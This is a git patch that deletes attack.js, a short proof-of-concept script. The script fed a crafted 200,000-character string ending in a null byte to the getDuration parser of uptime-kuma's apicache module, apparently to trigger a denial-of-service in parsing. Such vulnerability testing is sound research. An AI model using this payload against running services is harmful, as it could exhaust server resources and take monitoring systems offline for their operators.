From ea23a3324c1c3198c0d54c91eb75f29f3b56de25 Mon Sep 17 00:00:00 2001
From: DayShift <113507098+ShiyuBanzhou@users.noreply.github.com>
Date: Mon, 20 Jan 2025 19:53:09 +0800
Subject: [PATCH] Delete attack.js

---
 attack.js | 20 --------------------
 1 file changed, 20 deletions(-)
 delete mode 100644 attack.js

diff --git a/attack.js b/attack.js
deleted file mode 100644
index b13854dc7..000000000
--- a/attack.js
+++ /dev/null
@@ -1,20 +0,0 @@
-
-const apicacheModule = require("./uptime-kuma-92e982a91004e8f519e21ee6a0e4d4d21ecae99c/uptime-kuma-92e982a91004e8f519e21ee6a0e4d4d21ecae99c/server/modules/apicache/apicache.js");
-
-// 手动提取 parseDuration 函数
-const getDuration = apicacheModule.getDuration;
-
-// ""+"00".repeat(100000)+"\u0000"
-
-// 构造字符串
-const str = "" + "00".repeat(100000) + "\u0000";
-
-try {
-    // 调用 parseDuration 函数
-    let result = getDuration(str);
-    console.log(result);
-} catch (error) {
-    console.error(error);
-}
-
-